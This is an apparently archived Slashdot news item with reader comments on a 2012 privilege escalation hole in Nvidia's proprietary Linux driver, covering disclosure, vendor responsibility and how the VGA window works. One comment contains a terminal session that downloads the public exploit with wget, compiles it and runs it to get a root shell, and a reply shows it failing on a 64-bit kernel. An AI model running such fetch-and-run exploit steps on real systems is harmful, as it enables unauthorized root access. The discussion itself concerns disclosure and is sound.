Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

Use Windows | +5 Insightful

[h910]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful

[broginator]

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Open Source Advantage

[Nerdfest]

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage

[Dagger2]

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:A view to a kill.

[greg1104]

VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

Re:Who did he send it to at Nvidia?

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.

works here

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here

[dmitrygr]

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:Who did he send it to at Nvidia?

[nedlohs]

Yeah you don't get more flimsy evidence than a working exploit.

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

Re:Hoooo boy...

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.